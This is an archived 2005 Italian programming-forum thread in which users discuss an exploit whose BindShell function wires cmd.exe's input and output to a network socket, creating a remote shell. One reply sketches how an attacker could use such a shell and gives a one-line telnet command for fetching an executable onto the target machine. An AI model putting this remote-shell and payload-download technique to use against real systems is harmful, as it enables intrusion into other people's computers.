Torna indietro   Hardware Upgrade Forum > Software > Programmazione
Ricarica la Pagina incredibile!! O.o

Recensione vivo X300 Pro: è ancora lui il re della fotografia mobile, peccato per la batteria
Recensione vivo X300 Pro: è ancora lui il re della fotografia mobile, peccato per la batteria
vivo X300 Pro rappresenta un'evoluzione misurata della serie fotografica del produttore cinese, con un sistema di fotocamere migliorato, chipset Dimensity 9500 di ultima generazione e l'arrivo dell'interfaccia OriginOS 6 anche sui modelli internazionali. La scelta di limitare la batteria a 5.440mAh nel mercato europeo, rispetto ai 6.510mAh disponibili altrove, fa storcere un po' il naso
Lenovo Legion Go 2: Ryzen Z2 Extreme e OLED 8,8'' per spingere gli handheld gaming PC al massimo
Lenovo Legion Go 2: Ryzen Z2 Extreme e OLED 8,8'' per spingere gli handheld gaming PC al massimo
Lenovo Legion Go 2 è la nuova handheld PC gaming con processore AMD Ryzen Z2 Extreme (8 core Zen 5/5c, GPU RDNA 3.5 16 CU) e schermo OLED 8,8" 1920x1200 144Hz. È dotata anche di controller rimovibili TrueStrike con joystick Hall effect e una batteria da 74Wh. Rispetto al dispositivo che l'ha preceduta, migliora ergonomia e prestazioni a basse risoluzioni, ma pesa 920g e costa 1.299€ nella configurazione con 32GB RAM/1TB SSD e Z2 Extreme
AWS re:Invent 2025: inizia l'era dell'AI-as-a-Service con al centro gli agenti
AWS re:Invent 2025: inizia l'era dell'AI-as-a-Service con al centro gli agenti
A re:Invent 2025, AWS mostra un’evoluzione profonda della propria strategia: l’IA diventa una piattaforma di servizi sempre più pronta all’uso, con agenti e modelli preconfigurati che accelerano lo sviluppo, mentre il cloud resta la base imprescindibile per governare dati, complessità e lock-in in uno scenario sempre più orientato all’hybrid cloud
Il trailer più atteso dell'anno è qui. "Odissea" di Christopher Nolan ha la data ufficiale in Italia
I gamer vogliono i monitor OLED: soprattutto ASUS, poi Samsung
Samsung alza l’asticella dei televisori tra colori, AI e nuovi tagli da 55 a 155 pollici: al CES 2026 la nuova linea Micro RGB
Energie rinnovabili 2025: quasi 42% del totale, il fotovoltaico sorpassa l'idroelettrico
Le auto elettriche volano in tutta Europa, ed è europeo il primo produttore a novembre
Nuovo look per la finestra Esegui su Windows 11: come abilitarla subito
Rad Power Bikes è in bancarotta: come le batterie al litio difettose hanno distrutto un business
Cronos: The New Dawn diventa più accessibile, introdotta una
Riot Games alza lasticella dell'anti-cheat: nuovo controllo BIOS in arrivo
Netflix dice addio a 111 titoli originali: usciranno dal catalogo nel corso del 2026
Samsung prepara un foldable più largo per sfidare l'iPhone pieghevole
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 06-09-2005, 17:38   #1
71104
Bannato
 
L'Avatar di 71104
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
incredibile!! O.o
guardate qua ...

non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!!

viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?

cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...?

se è così mi cade giusto a fagiuuoolo
71104 è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 17:51   #2
tglman
Senior Member
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 414
Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker qundo si ha a disposizione una cosa del genere ti e sufficente fare un programmino che ti apre un socket in listent e appena arriva una connessione ti ci invia un file per poi eseguire sulla macchina remota una stringa del genere:
Codice:
telnet miamacchina miaporta >file.exe
per poter inviare un file exe che mi faccia un mondo di cose su quella macchina....

a logicamente per eseguirlo hai a disposizione la scell

Cavolo che fico!!!
tglman è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 18:11   #3
ilsensine
Senior Member
 
L'Avatar di ilsensine
 
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
Quote:
Originariamente inviato da 71104
...i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?
Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al
andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12
ilsensine è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 18:44   #4
71104
Bannato
 
L'Avatar di 71104
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
Quote:
Originariamente inviato da ilsensine
Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).
lo so che non è un bug, e anche se non si potesse fare si farebbe comunque in altra maniera (ad es. su Windows con una pipe); solo che fatto proprio così come dire mi sembrava un po' troppo esplicito, ecco
e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome
71104 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi

« Discussione precedente | Discussione successiva »

Recensione vivo X300 Pro: è ancora lui il re della fotografia mobile, peccato per la batteria Recensione vivo X300 Pro: è ancora lui il...
Lenovo Legion Go 2: Ryzen Z2 Extreme e OLED 8,8'' per spingere gli handheld gaming PC al massimo Lenovo Legion Go 2: Ryzen Z2 Extreme e OLED 8,8'...
AWS re:Invent 2025: inizia l'era dell'AI-as-a-Service con al centro gli agenti AWS re:Invent 2025: inizia l'era dell'AI-as-a-Se...
Cos'è la bolla dell'IA e perché se ne parla Cos'è la bolla dell'IA e perché se...
BOOX Palma 2 Pro in prova: l'e-reader diventa a colori, e davvero tascabile BOOX Palma 2 Pro in prova: l'e-reader diventa a ...
Il trailer più atteso dell'anno &...
I gamer vogliono i monitor OLED: sopratt...
Samsung alza l’asticella dei televisori ...
Energie rinnovabili 2025: quasi 42% del ...
Le auto elettriche volano in tutta Europ...
Nuovo look per la finestra Esegui su Win...
Rad Power Bikes è in bancarotta: ...
Cronos: The New Dawn diventa più ...
Riot Games alza lasticella dell'anti-che...
Netflix dice addio a 111 titoli original...
Samsung prepara un foldable più l...
Nintendo Switch 2: in arrivo cartucce pi...
Evento storico: la prima squadra di robo...
Fallito il lancio del razzo spaziale nip...
Truffa RAM: moduli DDR4 spacciati per DD...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi
Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 16:40.

Contattaci - Hardware Upgrade - Archivio - Note sulla Privacy - Su

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v